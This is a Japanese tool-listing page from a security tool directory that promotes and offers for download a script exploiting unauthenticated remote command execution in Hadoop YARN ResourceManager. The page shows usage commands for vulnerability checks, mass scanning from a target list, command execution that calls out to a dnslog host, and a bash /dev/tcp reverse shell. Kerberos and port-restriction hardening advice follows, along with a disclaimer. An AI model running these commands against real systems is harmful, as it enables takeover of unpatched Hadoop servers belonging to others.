Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Hadoop-Yarn-ResourceManager-RCE — Hadoop YARN ResourceManager 未認証RCE | Kitploit
ツール/GitHubGitHub/al1ex/hadoop-yarn-resourcemanager-rce
脆弱性スキャナー脆弱性分析エクスプロイトペネトレーションテストレッドチーミングリモートアクセスツール
GitHubal1ex/hadoop-yarn-resourcemanager-rce

Hadoop-Yarn-ResourceManager-RCE

Hadoop YARN ResourceManager 未認証RCE

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
39144年前Kitploit レビュー済み

脆弱性の影響

Hadoop yarn ResourceManager には未承認アクセスの脆弱性が存在しました。この脆弱性は、Hadoop のコアコンポーネントである Hadoop yarn に存在していました。Hadoop yarn はデフォルトで RPC サービスを外部に公開していたため、リモートの攻撃者はこの未承認の脆弱性を悪用して、RPC サービスを介して任意のコマンドを実行し、対象サーバーを制御することができました。この脆弱性はリスクが高く、被害も大きいこと、また詳細がすでに公開され、攻撃者によって悪用されていることを踏まえ、Apache Hadoop を使用しているすべてのユーザーは自己点検を実施し、速やかにセキュリティ対策を講じることをお勧めします。

脆弱性のある製品

Apache Hadoop Yarn *

脆弱性の確認

基本的な使い方

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py

img

脆弱性チェック

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -v true -t http://www.target.com 

img

コマンド実行

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com  -c "curl xxx.dnslog.cn"

attack

dnslog

バッチスキャン

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -s true -f target.txt

scan_result

リバースシェル

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "bash -i >& /dev/tcp/ip/port 0>&1"

reverse_shell1

参考

https://nosec.org/home/detail/4905.html

https://github.com/N0b1ta/Bit-Cannon/tree/master/Apache/Hadoop/YARN/hadoop-yarn-rest-api-unauth

安全上のアドバイス

1.未承認アクセスを防ぐために Kerberos 認証を有効にしてください。

root@kitploit:~
<property>
    <name>hadoop.security.authentication</name>
    <value>kerberos</value>
    <final>false</final>
    <source>core-site.xml</source>
</property>...
<property>
    <name>hadoop.rpc.protection</name>
    <value>authentication</value>
    <final>false</final>
    <source>core-default.xml</source>
</property>

2.外部アドレスが Hadoop RPC サービス関連ポートにアクセスすることを禁止するか、信頼できるアドレスのみに開放するよう設定してください。

厳重に宣言します: このツールを違法な操作に使用しないでください。このツールは、甲側および乙側の担当者が安全自己点検を行うためにのみ使用されます。ユーザーが違法に使用した場合、法的責任はユーザーが負うものとします!!!

ツールをダウンロード